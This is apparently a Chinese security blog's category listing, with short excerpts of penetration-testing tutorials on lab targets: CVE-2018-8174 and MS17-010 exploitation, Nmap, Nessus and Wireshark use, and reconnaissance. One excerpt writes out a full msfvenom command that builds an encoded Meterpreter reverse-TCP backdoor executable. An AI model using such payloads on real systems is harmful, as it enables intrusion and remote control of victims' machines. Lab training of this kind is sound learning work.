安全
文章平均质量分 65
月色晚来枯
沉迷深度学习ing
展开
-
利用0day-java环境-宏感染-安卓客户端进行渗透
一、利用 0DAY 漏洞 CVE-2018-8174 获取 shell0DAY 漏洞最早的破解是专门针对软件的,叫做 WAREZ,后来才发展到游戏,音乐,影视等其他 内容的。0day 中的 0 表示 zero,早期的 0day 表示在软件发行后的 24 小时内就出现破解版本,现在我 们已经引申了这个含义,只要是在软件或者其他东西发布后,在最短时间内出现相关破解的,都可以叫 0day。 0day 是一个统称,所有的破解都可以叫 0day。CVE-2018-8174 漏洞影响最新版本的 IE 浏览器及使原创 2022-01-30 17:04:31 · 6077 阅读 · 5 评论 -
制作windows和linux客户端恶意软件进行渗透
一、生成Windows后门程序获取shell使用msfvenom制作简易后门程序msfvenom 是 msfpayload,msfencode 的结合体,可利用 msfvenom 生成木马程序,并在目标机 上执行,在本地监听上线。msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=IP地址 LPORT=端口 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe原创 2022-01-23 20:23:37 · 3547 阅读 · 0 评论 -
利用msf对靶机metasploitable2和win7进行信息收集
一、基于 tcp 协议收集主机信息1、使用 Metasploit 中的 nmap 和 arp_sweep 收集主机信息Metasploit中也有nmapdb_nmap -sV 192.168.0.103-sV 探测打开的端口以确定服务这里我们可以看到目标开启的服务以及目标的MAC地址和操作系统2、使用arp_sweep模块探查局域网内主机use auxiliary/scanner/discovery/arp_sweep通过“show options”来查看需要设置哪些原创 2022-01-19 18:17:15 · 8626 阅读 · 0 评论 -
利用ms17-010对win7进行渗透
对Win7进行信息收集并使用metasploit进行渗透原创 2022-01-17 17:01:01 · 8928 阅读 · 0 评论 -
使用Nmap对靶机进行信息收集以及Nessus的安装并对靶机进行的漏洞扫描
以下是对本地搭建的靶机Metasploitable2-Linux进行的信息收集以及Nessus的安装并对靶机进行的漏洞扫描原创 2022-01-17 11:02:29 · 8619 阅读 · 0 评论 -
对内网主机进行主动信息收集
一、识别局域网内存活的主机1.利用arping命令检测局域网内是否存在对应主机arping IP地址 -c 1 | grep "bytes from" | cut -d " " -f 5 | cut -d "(" -f 2 | cut -d ")" -f 1若显示对应IP,则局域网内存在该IP2.使用 netdiscover 进行被动方式探测局域中存活的机器netdiscover -i 网卡名 -r 网段3.使用 FPING 查看局域中运行了哪些机器fping -ag .原创 2021-11-15 20:35:51 · 613 阅读 · 0 评论 -
WireShark抓包及常用协议分析
一、对ARP协议进行抓包分析使用arping命令扫描物理机查看 Address Resolution Protocol (request) ARP 请求包内容二、对ICMP协议进行抓包分析利用ping命令,向虚拟机发送数据包wireshark抓得以下数据三、对TCP协议进行抓包分析通过 Xshell 远程连接 Kali Linux 就会捕获到完整的 TCP3 次握手的链接...原创 2021-11-15 19:43:53 · 12119 阅读 · 1 评论 -
利用第三方服务对目标进行被动信息收集
一、利用漏洞响应平台查看可测试的网站二、被动信息收集1.利用第三方网站进行信息收集站长之家阿里云天眼查利用kali的whois命令使用谷歌搜索技巧,挖掘子域名等信息利用Layer挖掘机,挖掘域名...原创 2021-10-10 18:32:16 · 110 阅读 · 0 评论